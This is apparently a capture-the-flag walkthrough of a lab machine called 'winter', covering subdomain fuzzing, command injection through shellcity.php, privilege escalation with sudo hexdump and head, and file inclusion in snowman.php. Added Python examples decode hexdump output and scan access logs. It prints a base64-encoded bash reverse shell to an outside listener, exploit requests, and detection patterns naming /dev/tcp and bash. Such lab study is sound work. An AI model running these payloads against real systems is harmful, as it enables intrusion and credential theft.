Initial Access
The box starts with ports 22 and 80 open.
Reconnaissance
Directory scan
There is a robots.txt and a file upload.
└─# curl http://`IP`/robots.txt
Look for some real vulnerabilities ;)
id
whoami
ls
pwd
netstat -ano
catchme
winter
cd
cd ../
ftp
ssh
http
smtp
manager
admin
superadmin
ceo
cto
https
tftp
nano
vim
parrot
linux
shell
Look for real vulnerabilities; in other words, there may well be rabbit holes.
Registration page
Register, then log in.
The News page helpfully gives hints:
1. winter_hacker found OS Command injection .
2. catchme found File Upload Vulnerability .
3. Technical Support found IDOR .
Read More about OS Command Injection
That's all for today's news
This tells us the backend probably has command injection and file upload. There is also the large-wordlist scan, and one more hint.
Add winter to the hosts file for resolution and brute-force subdomains:
ffuf -u http://192.168.56.92/ -H 'Host: FUZZ.winter' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -ac
Two subdomains were found.
Visit them.
Directory scan:
└─# gobuster dir -ek -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://manager.winter -x php,txt
└─# gobuster dir -ek -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://cmd.winter -x php,txt
manual/
which is the Apache manual page.
The manager subdomain has a login form.
The cmd subdomain has a shellcity.php, a page for sending messages.
The last one is clearly the most suspicious.
Random input gives this prompt:
Try entering id in both fields:
Unexpectedly, it just worked.
Deeper testing revealed many restrictions. But since commands can be executed, this is clearly the way in, so fuzz the parameter name:
ffuf -u http://cmd.winter/shellcity.php?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ac
It quickly turned up run.
So chain a reverse shell command directly:
http://cmd.winter/shellcity.php?run=printf%20KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDAvMTIzNCAwPiYxKSAm|base64%20-d|bash
Privilege Escalation
catchme
We start with a hint:
www-data can run hexdump as the catchme user and can therefore read arbitrary files.
www-data@winter:/var/www/cmd$ sudo -u catchme hexdump -C /home/catchme/user.txt
00000000 48 4d 56 6c 6f 63 61 6c 68 6f 73 74 0a |HMVlocalhost.|
0000000d
www-data@winter:/var/www/cmd$ sudo -u catchme hexdump -C /home/catchme/.ssh/id_rsa
But the private key does not let us log in; presumably the .ssh directory permissions are deliberately lax so that the login is refused.
So try reading other files:
www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -C "/home/catchme/.profile" | awk -F '[|]' '{print $2}' | tr -d '\n.'
# ~/profile: executed by the command interpreter for login shells# This file is not read by bash(1), if ~/bash_profile or ~/bash_login# exists# see /usr/share/doc/bash/examples/startup-files for examples# the files are located in the bash-doc package# the default umask is set in /etc/profile; for setting the umask# for ssh logins, install and configure the libpam-umask package#umask 022# if running bashif [ -n "$BASH_VERSION" ]; then # include bashrc if it exists if [ -f "$HOME/bashrc" ]; then "$HOME/bashrc" fifi# set PATH so it includes user's private bin if it existsif [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH"fi# set PATH so it includes user's private bin if it existsif [ -d "$HOME/local/bin" ] ; then PATH="$HOME/local/bin:$PATH"fi
www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -C "/home/catchme/.bash_history" | awk -F '[|]' '{print $2}' | tr -d '\n.'
My Password is : winterusercatchexit
The password was found in .bash_history.
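The awk/tr pipeline above rebuilds the file from hexdump's ASCII column, where every non-printable byte is shown as '.', so `tr -d '\n.'` also deletes the real dots in names like ~/.profile and .bashrc (which is why the output above reads ~/profile and $HOME/bashrc). Decoding the hex column instead is lossless. The following is an added example, not code from the original writeup: a parser for `hexdump -C` output that also handles the `*` lines hexdump emits for runs of identical rows; the sample dump is constructed.

```python
import re
from typing import Optional

# Constructed sample of `hexdump -C` output for a small file. The '.' inside
# "x.y" is a real byte, while the other dots in the ASCII column stand for
# newlines; only the hex column can tell them apart. The '*' line is how
# hexdump squeezes a run of identical 16-byte rows.
SAMPLE_DUMP = """\
00000000  4d 79 20 50 61 73 73 77  6f 72 64 20 69 73 20 3a  |My Password is :|
00000010  20 78 2e 79 0a 41 41 41  41 41 41 41 41 41 41 41  | x.y.AAAAAAAAAAA|
00000020  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
00000040  41 41 0a                                          |AA.|
00000043
"""

# offset, then 1..16 hex bytes, then the optional |ascii| column
LINE_RE = re.compile(r"^([0-9a-f]{8})((?:\s+[0-9a-f]{2}){1,16})\s*(?:\|.*\|)?\s*$")


def decode_hexdump_c(dump: str) -> bytes:
    """Rebuild the original bytes from the hex column of `hexdump -C` output."""
    out = bytearray()
    last_row: Optional[bytes] = None
    squeezed = False
    for line in dump.splitlines():
        if line.strip() == "*":
            squeezed = True          # rows up to the next offset repeat last_row
            continue
        m = LINE_RE.match(line.strip())
        if not m:
            continue                 # final offset-only line, prompts, blanks
        offset = int(m.group(1), 16)
        row = bytes.fromhex("".join(m.group(2).split()))
        if squeezed and last_row is not None:
            while len(out) < offset:
                out += last_row      # fill the squeezed gap
            squeezed = False
        out += row
        last_row = row
    return bytes(out)


if __name__ == "__main__":
    data = decode_hexdump_c(SAMPLE_DUMP)
    print(len(data), data[:21])
```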
root
After switching user, the .ssh directory was indeed mode 777; after fixing it we could finally ssh in.
sudo head reads the flag. It can also read id_rsa, but again that does not get us in. Frustrating...
But the service listening locally on port 1336 has not been used yet.
Forward it to port 8000 with socat.
A directory scan finds snowman.php.
It can be fuzzed; here I give the file-read approach.
It lives under /opt/customer:
catchme@winter:/opt/customer$ sudo head -1000 /opt/customer/snowman.php
<!DOCTYPE html>
<html>
<head>
    <link rel="stylesheet" href="style.css">
    <title>USER</title>
    <style>
        .avatar {
            margin-left:10px;
            margin-top:80px;
            vertical-align: middle;
            width: 50px;
            height: 50px;
            border-radius: 50%;
            border:3px solid black;
        }
        ul {
            list-style-type: none;
            margin: 0;
            <!--List of linux shells-->
            padding: 0;
            overflow: hidden;
            background-color: #333;
        }
        li {
            float: left;
        }
        li a {
            display: block;
            color: white;
            text-align: center;
            padding: 14px 16px;
            text-decoration: none;
        }
        li a:hover {
            background-color: #111;
    </style>
</head>
<body style="background-color:black">
    <br><br><br>
    <div style="align:center;" class="divf">
        <form class="box" method="POST">
            <input required AUTOCOMPLETE="OFF" style="text-align:center;" type="text" placeholder="Message" name="name">
            <input required AUTOCOMPLETE="OFF" style="text-align:center;" type="password" placeholder="To" name="pass">
            <input type="submit" value="Send" name="sub">
        </form>
</body>
</html>
<?php
session_start();
if(isset($_POST['sub']))
{
    $us=$_SESSION['favcolor'];
    $msg=$_POST['name'];
    $to=$_POST['pass'];
    echo "<script>alert('$msg , Send to $to')</script>";
    if($msg==="id")
    {
        $ot=system($msg);
        echo "<pre style='color:white;'>$ot</pre>";
    }
    else if($msg==="whoami")
    {
        $ot=system($msg);
        echo "<pre style='color:white;'>$ot</pre>";
    }
    else if($msg==="pwd")
    {
        $ot=system($msg);
        echo "<pre style='color:white;'>$ot</pre>";
    }
    else
    {
        echo "<script>alert('RCE Detected')</script>";
    }
    $fi=$_GET['exec'];
    include($fi);
}
?>
Vulnerability analysis:
- system($msg): whitelisted command execution.
msg can only be id / whoami / pwd to trigger command execution; anything else alerts "RCE Detected".
There is no injection point and the command is not controllable, so this cannot be exploited for now.
- include($_GET['exec']): file inclusion (LFI).
This is the main exploitation point.
By including log files, php stream wrappers, session files, temporary upload files and so on, controllable code can be injected to achieve remote code execution.
So first create a reverse shell file on the target, then include it.
Construct the payload:
curl 'http://192.168.56.92:8000/snowman.php?exec=/var/www/html/upload/r.php' -d 'sub=Send'
This gives a root reverse shell.
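From the defender's side, both footholds in this writeup leave a clear trace in the web server's access log: a run parameter on shellcity.php that reaches a shell, and an exec parameter on snowman.php that reaches include(). The following is an added example, not from the original post: a small Python scanner that flags those requests in constructed Apache log lines (the client IP, timestamps and user agents are made up; the paths and parameter names are the ones shown above).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines modelled on the requests in this
# writeup. Client IP, timestamps and user agents are made up; the paths and
# parameter names (shellcity.php?run=, snowman.php?exec=) are the real ones.
ACCESS_LOG = """\
192.168.56.100 - - [10/Jan/2024:10:00:01 +0000] "GET /shellcity.php?run=printf%20KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDAvMTIzNCAwPiYxKSAm|base64%20-d|bash HTTP/1.1" 200 512 "-" "curl/8.0"
192.168.56.100 - - [10/Jan/2024:10:05:42 +0000] "POST /snowman.php?exec=/var/www/html/upload/r.php HTTP/1.1" 200 211 "-" "curl/8.0"
192.168.56.100 - - [10/Jan/2024:10:06:10 +0000] "GET /shellcity.php?run=id HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.168.56.100 - - [10/Jan/2024:10:07:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# shellcity.php passes `run` to a shell; snowman.php passes `exec` to include()
SHELL_CHAIN = re.compile(r"(\||;|`|\$\(|/dev/tcp|\bbase64\b|\bbash\b|\bsh\b)")
LFI_VALUE = re.compile(r"(^/|\.\./|^[a-z]+://)")


def classify_request(target: str) -> list[str]:
    """Return findings for one request target; an empty list means benign."""
    findings = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key == "run":
            kind = "command-injection" if SHELL_CHAIN.search(value) else "command-execution"
            findings.append(f"{kind}: run={value!r}")
        elif key == "exec" and LFI_VALUE.search(value):
            findings.append(f"file-inclusion: exec={value!r}")
    return findings


def scan_log(log: str) -> list[tuple[str, str]]:
    """Scan access-log lines and return (request, finding) pairs."""
    hits = []
    for line in log.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        request = f"{m.group('method')} {m.group('target').split('?')[0]}"
        for finding in classify_request(m.group("target")):
            hits.append((request, finding))
    return hits


if __name__ == "__main__":
    for request, finding in scan_log(ACCESS_LOG):
        print(request, "->", finding)
```

The hardening that makes these alerts moot is in the application: never include() or system() a value derived from the request, and map a fixed set of keys to fixed server-side files or commands instead.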